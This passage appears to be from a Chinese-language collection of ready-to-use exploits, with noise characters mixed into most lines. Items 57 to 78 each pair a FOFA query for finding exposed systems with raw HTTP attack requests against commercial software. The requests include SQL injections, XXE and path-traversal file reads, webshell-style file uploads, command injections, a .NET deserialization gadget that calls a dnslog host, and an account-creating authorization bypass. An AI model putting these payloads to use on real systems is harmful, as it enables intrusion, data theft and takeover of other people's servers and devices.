User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
* Z/ h, u" d' \ Z/ L% u, zContent-Type: application/json
5 B9 j7 d; x+ v) w' r$ A. \
: V- N. z5 g) F/ f8 T1 `+ K! G# r{
$ ^# e& D7 Z4 k, ?/ I5 @5 r "storeID":{( X- g# F) \$ ~& v* l
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35", E# ?5 e+ X7 }$ S1 r" Y
"MethodName":"Start",4 Z- K! ]7 K9 U2 y
"ObjectInstance":{. ]' }/ X% `, G8 V8 ~$ j
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",2 R9 U! ?* _( p( M# A" C/ P
"StartInfo": {
4 j9 x; N1 L9 m$ |7 b$ ? "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
" s5 H% o# c, E6 o% F$ F "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
# {) G- \, a( B! z' s2 T }
c3 C* H* w/ [0 n* ~ }; e) }* D' i `4 A5 s
}4 R1 _$ a" S7 J& q; r$ m" h
}
+ w" k) Z% I* J( V" `+ l; H4 F6 E/ i8 b R
. p3 P% @ s/ C& c- ^
57. 畅捷通T+ keyEdit.aspx SQL注入) p# Z4 G' g, Y# m# e7 S
FOFA:app="畅捷通-TPlus"
' ?7 H K3 d0 {2 k6 nGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.13 @8 o# E3 w; Q! d" `% b M
Host: host
+ z; i0 N; e. R X5 uUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36( v9 l5 w; H) t) m5 L2 J
Accept-Charset: utf-8
; ]- { D. f/ ^1 r4 i$ t" oAccept-Encoding: gzip, deflate" f/ T# `. n9 g3 F$ I f
Connection: close. q# ? \5 ~, [1 o* z) l
- g. \/ G' S; t) I; n8 M5 j
; }; G- B2 y" B/ A4 t$ [' U
58. 畅捷通T+ KeyInfoList.aspx sql注入
9 O2 `1 B8 M% Y5 ~FOFA:app="畅捷通-TPlus"- I6 L8 t6 a2 G/ x. q, I
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
1 r# ]5 ^' B7 c. k; X. v: O! aHost: your-ip
: H, V1 q" n! ^8 C4 [User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
+ L+ S% r' Y4 E; ^6 d4 H: ]3 MAccept-Charset: utf-8/ t5 l p2 m j0 W9 O7 ^5 Q. h
Accept-Encoding: gzip, deflate
3 K& M: B) t0 ]& O; L! iConnection: close
) R3 ?) ^9 {: Z' I4 y: W0 h8 a8 ]) \+ e$ S& E" s3 r
- j7 N- S. q8 T3 t5 M+ A3 U59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行; M7 j. G' X: I& v; P+ ~- }
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"- ^9 A8 g0 W% H& F4 O
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
' O0 A2 [8 _; f+ {& t6 aHost: 192.168.86.128:9090$ c, r% x9 n7 F) ?: O
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
: g* p! ], e- r" `Connection: close1 P' F. ~* _8 C( l7 N
Content-Length: 1669
) Y0 j8 U: `, c7 @Accept: */*: ~! F8 v# o. g9 B& d
Accept-Language: en& |2 A. Z, g1 E
Content-Type: application/x-www-form-urlencoded
8 W0 J: E0 D. c0 E hAccept-Encoding: gzip3 K$ N. `$ j; F8 l$ w+ }
6 d( i: I8 p% z2 l5 o
PAYLOAD
, T8 l' E% }# Y2 d% @. ~! V" N7 ~- L7 A$ m8 W
& }) T/ H8 t8 U$ c4 l6 B60. 百卓Smart管理平台 importexport.php SQL注入
8 h% u1 ~. A6 S2 a( HFOFA:title="Smart管理平台"
5 R9 z" J o x9 u `) y( ? e/ ]GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.14 ^. r4 |6 C4 p$ q9 X) Q
Host:
9 s$ g0 h {& l1 `5 Y. ]) b/ f$ tUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36/ M) t l" u$ U: _, V% E1 e3 D7 V# w
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 @( F5 }6 f; S- J& ?/ x# [Accept-Encoding: gzip, deflate/ D# v9 r+ ~" G1 [2 _. \6 Z& G! A
Accept-Language: zh-CN,zh;q=0.9
. e& i" ~6 L6 I; aConnection: close
) @# u0 ~& t) D" I2 |. o
! X$ q# C% n( y; f* K
# `) p5 H+ J# S8 Q4 }61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
/ x) y* ~# D* ?FOFA: title="欢迎使用浙大恩特客户资源管理系统"8 I I; }* M0 }
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1% O% R. R. A1 A$ o3 L
Host: x.x.x.x$ o" t2 ?/ V2 M1 r! Q5 U* @+ q8 w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15: ^3 S3 N ^4 A6 ]
Connection: close# g4 S- I# B7 U/ Q5 J* U
Content-Length: 27$ A5 `6 O: }& k8 t, w6 U
Accept: */*
7 K+ L/ e5 p$ O2 O8 vAccept-Encoding: gzip, deflate
7 e/ ?! H! `" J3 S+ J$ X$ VAccept-Language: en" h9 m0 t3 h0 B$ P9 V: X4 n, u
Content-Type: application/x-www-form-urlencoded) }( f- n7 Z+ `) V) A
& G. i5 E& ~) Q) t4 w3 l5 j8uxssX66eqrqtKObcVa0kid98xa
9 ?- F V2 Y; }0 e1 A( M+ L7 e. ]1 C: K: O8 c# H' P7 a% e- ^" q2 {6 z
5 w3 h% h* x! t U3 y) p5 w" l% a, ^
62. IP-guard WebServer 远程命令执行
# v* I8 N% ]% U! |2 b% g2 SFOFA:"IP-guard" && icon_hash="2030860561"! Z9 D( D- u. W# A d0 K- {
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1! o+ }1 `! O7 d0 Y9 l4 N( S
Host: x.x.x.x6 y) [8 O6 P$ @) T' V1 x# d$ K
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.369 ?- ^. L, w1 ^) Y5 }, ?! }6 @
Connection: close$ g+ y' j/ A+ Z0 @* _1 C9 V( C M
Accept: */*: P* \) }3 f3 @4 p# h, M4 h
Accept-Language: en9 c; R: X& n0 k1 I( `
Accept-Encoding: gzip
" d* }2 j. n$ B& X( R- d. B3 }: \
$ O8 i+ l, i4 }9 J/ K: J5 t) j. ^* u' o j1 |1 l1 y
访问9 ?1 O, Q1 _ c( s
, O$ X ], _ H' e
GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
5 r6 F: O7 O, l/ U2 |" MHost: x.x.x.x
) j% U* u/ i2 D6 z# d: t4 z3 ]
9 p4 y: A6 L# d: w# i2 r8 d/ Z# H* W5 D" P& [% z
63. IP-guard WebServer任意文件读取3 X- l( A$ ?3 z/ i' K
IP-guard < 4.82.0609.0
3 b D3 [6 ^: g/ \2 D' S1 VFOFA:icon_hash="2030860561"
9 O, m" ]2 K& \POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1- Y% y/ m4 l1 w3 v0 i
Host: your-ip. h' b' W- c1 |
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
/ e+ W/ H) a: ~; IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 g8 j$ {" }- ^3 r7 }+ w; ^* m
Accept-Encoding: gzip, deflate
p" @) L+ B; E7 J; _7 G* }Accept-Language: zh-CN,zh;q=0.9" _# S: o9 p8 d1 Z+ _) L& w
Connection: close7 Q! g k5 b- y8 e+ S6 ^3 t& C
Content-Type: application/x-www-form-urlencoded
; ] I6 Y# _+ W9 S* w- q" E% d: e
9 l6 v% P ]6 n7 } l# v5 Z9 fpath=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
! j. g8 u k; K8 i. j) }" b& F1 }% z
64. 捷诚管理信息系统CWSFinanceCommon SQL注入, m5 I" R, Z& B4 Y: s8 D; `" T
FOFA:body="/Scripts/EnjoyMsg.js"
$ b" c4 z5 A9 L3 |# A9 lPOST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
1 G& D, g: k9 Z# |Host: 192.168.86.128:9001- T' `8 b, Y, p9 ^! J# s
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.362 S! u4 l. m: U7 ?' q
Connection: close$ @2 \" C: o8 z/ X
Content-Length: 369' L& l" X) B( @- q" I: g3 d! c
Accept: */*
2 b. [; C1 x& G* HAccept-Language: en1 x c. Z, o: _3 K6 R/ p
Content-Type: text/xml; charset=utf-8
; y9 U: f2 Y% X1 KAccept-Encoding: gzip$ `1 a, e: _3 P, y
7 k* L: o2 U* o* N; l0 S* X<?xml version="1.0" encoding="utf-8"?>8 q8 n* c, Y2 [- u
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
$ f, S c& u# p$ ^* w' [<soap:Body>
( s: k4 C% L; x$ C) M <GetOSpById xmlns="http://tempuri.org/">% B1 p w0 i; O0 t
<sId>1';waitfor delay '0:0:5'--+</sId>
' _& F$ k N3 c V6 } </GetOSpById>- X2 t9 `9 F0 d5 {. H- ^
</soap:Body>
1 q. n6 b1 @, `5 m0 h</soap:Envelope>
3 \3 k; \6 Z: C
; C, |" J( a- I2 }/ M/ t; q6 Z
+ Q d* b) a6 _65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过 _( g3 s4 l" V0 l1 T$ L
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
. C2 z! {/ M' j; y. Q响应200即成功创建账号test123456/123456
. B% j w6 V% ~. d M) ?POST /SystemMng.ashx HTTP/1.11 C/ b5 ^2 }$ V, l: M8 m* [, F
Host:
6 x8 S! m' ]; s" _- [* U7 PUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)1 L1 x! e6 z% S4 d4 x' W5 m
Accept-Encoding: gzip, deflate
; m& [2 M8 a' w& q% aAccept: */*
. h1 Q! S, S# hConnection: close
9 S# }/ ^2 v- y8 R( I$ L; XAccept-Language: en
+ a' r' R0 Q/ B& pContent-Length: 174, ~: |3 z9 t0 X2 r/ Q0 n9 |
4 f- E. n% B! moperatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
; E, ]. s* {$ ?/ a. w6 u
8 W3 [7 Y) R4 u/ d0 @5 o$ ~9 n. ^9 O% f9 W4 Q \- F' `9 Y- E# T
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
' ?% `1 N Y' Y- R. E- FFOFA:app="万户ezOFFICE协同管理平台"
% r& E$ S i v* M4 l) d
2 U8 q* |/ ]4 s, ] XGET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.15 n; Y4 ~* ~* V/ V+ T$ n
Host: x.x.x.x+ P& m2 i0 F5 e# Y# d
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36' r* R& |9 S5 O, b
Connection: close
: U* \) {4 m0 [! SAccept: */*( r1 x! h7 ]$ z3 H. r. T, }
Accept-Language: en# g3 A% D3 T# c# C$ ]! X5 [8 u. N$ Y
Accept-Encoding: gzip
- Z! p! j9 ?" [+ n4 M ~" i6 H- V' m0 V; h* b ~
' M, Q7 m. e( x# {# {. ~# w
第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在: [) [5 j1 s7 r, m; d
5 _) f; M2 Q3 X2 N" I" k5 ^3 S67. 万户ezOFFICE wpsservlet任意文件上传
1 L$ g& P/ G4 u) h' z$ y) t, @) T9 W: kFOFA:app="万户网络-ezOFFICE"1 U, N' Z7 X$ d- t4 F
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型4 I7 D( ]( v/ ?
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.17 S7 M! F# g) z" I
Host: x.x.x.x
9 }4 u/ B- m9 p" yUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.01 m2 d* r- `# C! {; f
Content-Length: 173
# I( `9 s+ ?$ w7 KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.83 Z0 E2 U1 x, X) O+ [8 i0 S' P
Accept-Encoding: gzip, deflate% I+ ~9 Q" }3 p3 H; l
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.37 F1 X9 Q. N& @7 T: c& W
Connection: close% x: v' a* h; u1 V) x2 j
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp0 T0 m' m0 x: F% G
DNT: 1$ q' @) }' a, z" Z2 k2 q- e# K( O
Upgrade-Insecure-Requests: 1# m! N8 O8 w s O+ M: {/ B
. T: n& y5 y& x! J0 b0 q$ v--ufuadpxathqvxfqnuyuqaozvseiueerp& a7 t* i7 U% W
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"
8 i" g" @! } }8 p4 ?- i- H
% L& } p: U& I: ^* a& M2 K3 k7 I<% out.print("sasdfghjkj");%>+ V; H6 K. q- Y1 `) z6 X
--ufuadpxathqvxfqnuyuqaozvseiueerp--
2 N$ G2 _) R. ^& i; M1 E" h. m( ]8 l& a; ^
& I8 t6 Y, f( f! n' G' y8 }文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp2 x Y9 Q6 `2 z" U6 q
0 e: g7 J8 E) K2 p; e; T
68. 万户ezOFFICE wf_printnum.jsp SQL注入
+ u% z7 F7 `$ s9 g. lFOFA:app="万户ezOFFICE协同管理平台"7 M% Q! N) T$ R; n
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.17 a! J9 z1 [; g: W8 a
Host: {{host}}
: `; U2 @- S6 r8 I4 X0 w" qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36
* _8 C; F t2 u, LAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8( T, T$ @% P( Z6 z J6 C
Accept-Encoding: gzip, deflate. ^* A9 e( Y5 f5 |: j
Accept-Language: zh-CN,zh;q=0.99 |5 d% e: U: c+ S& J% {
Connection: close
! c* K" N% C$ H& I" R+ J" E+ z2 ]1 M1 g* w5 i# Z
$ k1 I2 e+ f7 Y, R0 j* H& A( e69. 万户 ezOFFICE contract_gd.jsp SQL注入
/ S; ^/ i& y! D" z' [FOFA:app="万户ezOFFICE协同管理平台"4 e( u W# U! v0 U% j7 D
GET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.14 V/ Z5 a4 C2 L7 M+ V
Host: your-ip1 U' B. W& D9 B+ ] b* a% `" j3 I
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.362 C* z5 Z5 Q- ]- C; a8 n, J+ |
Accept-Encoding: gzip, deflate
) a7 J$ C, R0 X; `Accept: */*2 z% Q( Y. g7 K& z* [# K5 H5 S
Connection: keep-alive! H) A' q" i+ e, z# L
2 \. I8 Y2 k2 H5 D* s3 C0 l
" o4 p' o9 ?- N, m9 J) C70. 万户ezEIP success 命令执行, `/ k+ c2 Y# _
FOFA:app="万户网络-ezEIP" g4 Y% F$ t. S# U
POST /member/success.aspx HTTP/1.1% g6 b; }1 @ J" Y0 ^" U
Host: {{Hostname}}
4 H& _9 \( F* Z! V! t2 cUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
5 {+ C) i; G/ }& _( f3 N4 S) x8 T: CSID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
. `& o X; @5 h% F$ s+ c: NContent-Type: application/x-www-form-urlencoded* F; z0 o- D7 Z
TYPE: C& D( l1 p4 U3 V2 R
Content-Length: 167027 ?. k) Q K+ | D5 y
! P5 V) R5 T/ L$ }& d5 {; q
__VIEWSTATE=PAYLOAD
; } B0 w# N0 N6 j }% P- S7 D1 A3 J4 g( g+ T `( z+ [
, V2 s" b! W! l1 a
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
- Y( s- c; J( e! i) U7 J$ n( ?& yFOFA:body="PM2项目管理系统BS版增强工具.zip"
: }( z( O1 Y% h5 @" D6 KGET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1- _/ @6 v, g1 p' C* ]
Host: x.x.x.xx.x.x.x
' |4 z# l, t: ]# x$ bUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
; b/ H+ F; A! J; o6 Z$ i- j) @Connection: close
$ ~, F: [7 q3 p% C* {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
6 p; O: l7 u- b6 u1 `( gAccept-Encoding: gzip, deflate
( [+ X7 Q9 Q# V/ D3 R% i6 |Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
. b5 q" u. d# }6 e5 d+ h" i+ BUpgrade-Insecure-Requests: 1
5 s7 j' D4 f* D6 Q$ O$ ^/ K0 n& \. ?* V; ?+ d9 |. }* Y
$ \0 A: f+ \1 w/ |! N2 |2 j72. 致远OA getAjaxDataServlet XXE0 Q/ K7 d1 v0 G) ~' Q& M% t
FOFA:app="致远互联-OA" @7 w) x: T5 m8 T1 t
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
- Q6 e$ F& p5 Y, E0 a& JHost: 192.168.40.131:8099! G* `8 ~8 j9 @6 Q- |
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
0 s" |; R5 i7 @ \) `4 `Connection: close" L' M1 L! H3 W3 D
Content-Length: 583
( f( j! ~( f/ e0 a9 \Content-Type: application/x-www-form-urlencoded" F- h& `/ _+ }+ d8 g% P/ j
Accept-Encoding: gzip
8 E6 g0 q& G% ?8 g- X
) D, _1 Z6 }; x) G+ vS=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E8 ^7 e0 K) n+ f; t9 d
; O' r+ v2 L5 @0 U' m
& g$ K) X8 F$ m. C6 A73. GeoServer wms远程代码执行
( l( F n' a. v; E F- c( IFOFA:icon_hash=”97540678”
% u* c0 X3 r+ g4 V/ fPOST /geoserver/wms HTTP/1.1
: z# ~% E% f+ G9 w# F: lHost:
/ k; U; d4 X2 n* N9 z2 ~* JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
" I5 D0 g( q; TContent-Length: 19816 D D; A6 {5 S8 r- B1 P
Accept-Encoding: gzip, deflate- l, U- A3 v: l9 i
Connection: close3 q) G% t, K# h, J7 c
Content-Type: application/xml
0 y! Y# F5 ]9 ?6 o" y7 ?SL-CE-SUID: 36 U ?6 [% H+ _: p" U
( j' n& U$ h H& A. N
PAYLOAD
+ q' o5 a4 i- ~+ n( C% n+ X$ A: }5 }2 C. ~" p: Z; {' o! S5 |
: ~$ X9 W; ~+ }: V4 ` j$ A74. 致远M3-server 6_1sp1 反序列化RCE3 F/ X+ F$ }4 C& m/ S0 ~
FOFA:title="M3-Server"
+ I& T' O9 U7 o% o4 l. KPAYLOAD: [; o6 _1 l1 {- B( q' \- {2 a
8 b% h, {" U+ _: S! Z8 g$ o/ W% @' h
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE3 F2 k! z, ~! y k% u
FOFA:app="TELESQUARE-TLR-2005KSH"
3 |+ J" P q( J5 W7 o# F7 ]GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1& P& e3 e I2 d! D
Host: x.x.x.x0 b/ f: q: ]: e* c( n5 A; i6 B, _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 I3 B d( r% O& ?, ]
Connection: close% j- m- i4 I& n. _$ ~
Accept: */*) G4 g. i# f6 E2 o+ t: n( c
Accept-Language: en
& D8 u# H6 U5 W9 X- [0 f, vAccept-Encoding: gzip4 R( b+ b8 B0 m, C2 y
+ @6 n+ U: s2 s% \) K
( ]# {8 @; O: p! k4 w1 y( h# \8 ^GET /cgi-bin/test28256.txt HTTP/1.1
0 Q, Y& N& o7 z4 S- nHost: x.x.x.x
7 s3 A5 X( W% \: J. v e& T0 ~( ~1 z6 z6 @7 _2 E3 q; D
# p" s/ A+ d: x0 X* G( N3 Q3 B
76. 新开普掌上校园服务管理平台service.action远程命令执行/ ^# W. r9 |# S9 n3 t6 }
FOFA:title="掌上校园服务管理平台"
& s. q% _" r. |, u4 {: hPOST /service_transport/service.action HTTP/1.16 C, P/ Q; P4 D/ h) Z2 {" P3 ^! R
Host: x.x.x.x
P! R) Z4 _) aUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.06 Z0 Z# i8 v) M h U3 _; [) T
Connection: close! v- e8 o5 U' z- Z7 l
Content-Length: 211" [ p* @ A0 Q$ Z6 w) k
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
( J" ~# q! K: hAccept-Encoding: gzip, deflate
5 O4 w& [! B0 C0 z" c; [& LAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 A: k7 o4 ^% D+ g3 jCookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4$ t0 x8 D/ H/ h4 L
Upgrade-Insecure-Requests: 1# t7 x+ y. N5 B6 s! J$ s0 L3 Y
& N; S% C5 k' v+ |4 s4 X/ ^" {6 Q
{
) Y/ V5 _% a/ d {# i/ d"command": "GetFZinfo",$ n: F. m" |8 Z- v1 `9 ?4 Q
"UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"
. _# o3 X0 Y: d) Z! j ?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"/ m/ a1 a& s2 \% x B1 J5 c: ^
}
! @8 {" O/ `$ `8 T; K( v
' @4 L/ T, d/ B6 D( n0 f2 J
4 |- u; L$ ]" U0 a. r* wGET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1
" X" c3 a5 N* I7 B$ f2 M& hHost: x.x.x.x
2 @% R7 _2 d: }. a/ x9 t
- S3 q1 f o7 ^1 j$ j: V; H+ y" w, M1 p7 R
) f7 o) y2 m' T; Q4 j$ B9 K& W6 s
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
' S7 C: f N( j# i( S: C5 OFOFA:body="F22WEB登陆"
' y1 R7 L( W; C k; t, oPOST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1. Q- K! i' m7 V( y: }0 V
Host: x.x.x.x6 w d; `* O9 g) F& ], M
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
6 ?3 [' W" r1 S, I3 Y/ L7 fConnection: close
4 C' ~8 V* o2 M% q5 TContent-Length: 433
' F* C8 a' z9 U8 {9 c6 nAccept: */*
. v# p, D2 o. b0 d/ UAccept-Encoding: gzip, deflate0 |+ }& _" k& v1 f; |
Accept-Language: zh-CN,zh;q=0.96 ]% F2 A+ E4 D4 c6 ?
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix% F* _0 [: f" e: l/ A" t
* I! T, w( f8 S+ G- Q8 z------------398jnjVTTlDVXHlE7yYnfwBoix
4 ]9 j/ n: x7 WContent-Disposition: form-data; name="folder"
7 {* A& s5 J0 D
6 R, t: v8 m) H# `/upload/udplog
3 \+ o, L+ ?$ P: s; F% P" A------------398jnjVTTlDVXHlE7yYnfwBoix
( d) ~. p- h9 b) y. D, BContent-Disposition: form-data; name="Filedata"; filename="1.aspx", E3 v& z% v" I" c
Content-Type: application/octet-stream
. M: F/ J% C1 b1 K* o, O5 c8 o/ X& y+ b* S0 |3 F/ Y6 U1 j1 H* a
hello1234567! |2 o9 M; G1 o9 N8 z0 X) {% q
------------398jnjVTTlDVXHlE7yYnfwBoix
4 x8 [8 d9 \5 c3 g# `& fContent-Disposition: form-data; name="Upload"# f3 Q" `9 A, L. K
$ D% L2 C; O/ ] W3 F4 }0 o9 q( TSubmit Query0 o- P5 q; Q) F9 w1 a9 P4 h
------------398jnjVTTlDVXHlE7yYnfwBoix--
, R. s, [+ b! n( R* M/ z* d: X+ e) k# m/ S* a: x. o
9 B% D" p) I, W! Z$ z' ~/ |7 L
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传, [: ?3 A4 I; [+ C T
FOFA:icon_hash="2001627082"
/ _7 s6 e( w0 n" Y( bPOST /Platform/System/FileUpload.ashx HTTP/1.1
/ X) o N3 ^% XHost: x.x.x.x
/ S8 i9 A& D9 @6 R Y% |& b. @User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 _/ ?; e/ w1 W n k
Connection: close
0 M% y$ j! j2 V% ]Content-Length: 336
3 j M4 v5 D5 g9 [8 v5 HAccept-Encoding: gzip
* T( m: H2 r3 uContent-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l
1 [6 z3 w# M9 j8 B" R% S* p! y7 _- i8 O
------YsOxWxSvj1KyZow1PTsh98fdu6l
$ X& i+ P6 ?. n$ [0 ?Content-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt" `) F' e5 X f
Content-Type: image/png
' p7 I% V. p7 e; q2 D( n1 [1 j
